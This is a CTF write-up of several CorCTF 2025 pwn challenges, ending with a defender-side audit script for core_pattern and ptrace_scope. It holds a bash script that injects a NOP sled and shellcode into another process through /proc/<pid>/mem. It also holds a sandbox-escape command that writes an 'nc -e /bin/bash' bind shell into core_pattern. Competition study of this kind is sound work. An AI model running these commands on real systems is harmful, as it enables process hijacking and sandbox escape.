CorCTF 2025: Pwn (no windows)

📑 Prologue

We (@r3kapig and @ProjectSEKAIctf) got 2nd place in CorCTF! Thanks to my teammates and @cor_ctf for the good time. I solved 2.5 pwn challenges and could have solved one more if I had had 30 more minutes after the game. I had believed it was a kernel 1-day challenge for two days.

frogcompute

I noticed the OOB access and changed the length limit, but failed to construct the brainfuck program within the limited number of bytes.

A trick I learned from my teammate @Sueasp, who finally solved the chal. This loop moves the pointer until it reaches a cell holding some byte, e.g., move until 0xff: [>>>>>>>>+]. The + wraps an 0xff cell to 0, which is what terminates the loop.

With this we stop at rbp and then change the return address to the win function.

hangbuzz101

This chal's filesystem is read-only, but we are allowed to create a new namespace, so we can create one and mount a tmpfs. Then we can run a random syzprog to trigger the warning.

zenerational-aura

Use the gadget at 0xffffffff81605e07 to pivot the stack so we can run our ROP chain.

tua-cugina-systems

We failed to solve this but were super close; we would have needed maybe 30 more minutes. I misled the team into thinking it was a 1-day kernel chal. In the end we found it was a user-space + pentesting chal.

Inject the asm into the process

#!/bin/bash
# start the victim and look up its pid
busybox sleep 15 &
# take the start address of the first mapping in /proc/<pid>/maps
VICTIM=$(pgrep -f "busybox sleep 15") && echo $VICTIM && LEAK=$(awk 'NR==1{split($1,a,"-");print a[1]}' /proc/$VICTIM/maps) && NEW_HEX=$(printf "%x" $((0x$LEAK))) && DEC_NEW=$((0x$NEW_HEX))
# write a NOP sled followed by the shellcode into the victim through /proc/<pid>/mem
( printf '%*s' 761856 '' | tr ' ' '\x90'; printf $SHELLCODE ) | dd of=/proc/$VICTIM/mem bs=1 seek=$DEC_NEW conv=notrunc status=none

In the shellcode, we 1) memfd_create to put our lib in and use snprintf to bypass the name limit; 2) run TC_LIB_DIR=/proc/self//fd////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////3 tc exec e; 3) escape the nsjail: echo '|/usr/bin/nc -lvnp 8165 -e /bin/bash' > /proc/sys/kernel/core_pattern and nc localhost 8165 (stolen from other people who exploited it).
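Step 3 only works because the sandbox can write the host's core_pattern, and the injection above only works because another process's /proc/<pid>/mem is writable. Here is an audit script I added for this writeup (not part of the challenge or the original post) that reports those two host settings from the defender's side; the expected coredump handler path is an assumption, and the values in the checks are constructed.

```shell
#!/bin/sh
# Added audit helper, not from the writeup. Reports the two host settings the
# technique above relies on: a core_pattern that pipes to an unexpected program
# (or is writable from here) and a Yama ptrace_scope that lets any same-uid
# process write /proc/<pid>/mem. ALLOWED_HANDLER is an assumption; adjust per distro.
ALLOWED_HANDLER=${ALLOWED_HANDLER:-/usr/lib/systemd/systemd-coredump}

# core_pattern_risk PATTERN -> "file", "pipe-handler" (matches ALLOWED_HANDLER)
# or "pipe-handler-unexpected" (core dumps are piped to some other program).
core_pattern_risk() {
  case "$1" in
    '|'*)
      handler=${1#\|}          # strip the leading pipe
      handler=${handler%% *}   # keep the program only, drop %P %u ... arguments
      if [ "$handler" = "$ALLOWED_HANDLER" ]; then echo pipe-handler
      else echo pipe-handler-unexpected; fi ;;
    *) echo file ;;
  esac
}

# ptrace_scope_risk VALUE -> "open" (0: any same-uid process may attach to and
# write /proc/<pid>/mem), "restricted" (1 or 2) or "disabled" (3).
ptrace_scope_risk() {
  case "$1" in
    0) echo open ;;
    1|2) echo restricted ;;
    3) echo disabled ;;
    *) echo unknown ;;
  esac
}

# audit_live_host: reads the running kernel's values, prints one line per
# finding and returns 1 if either setting is in a risky state.
audit_live_host() {
  rc=0
  cp=$(cat /proc/sys/kernel/core_pattern 2>/dev/null) || cp=""
  ps=$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null) || ps="missing"
  cpr=$(core_pattern_risk "$cp")
  [ -w /proc/sys/kernel/core_pattern ] && writable=writable || writable=read-only
  echo "core_pattern: $cpr ($writable from this process): $cp"
  [ "$cpr" = pipe-handler-unexpected ] && rc=1
  [ "$writable" = writable ] && rc=1     # a sandbox must never be able to change it
  psr=$(ptrace_scope_risk "$ps")
  echo "yama ptrace_scope: $psr ($ps)"
  [ "$psr" = open ] && rc=1
  return $rc
}

if [ "${1:-}" = "--live" ]; then audit_live_host; fi
```

Run it with --live inside the sandbox to see what a jailed process could reach; a non-zero exit means one of the two settings is in the state the escape needed.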

Epilogue

Cool CTF, had a great time.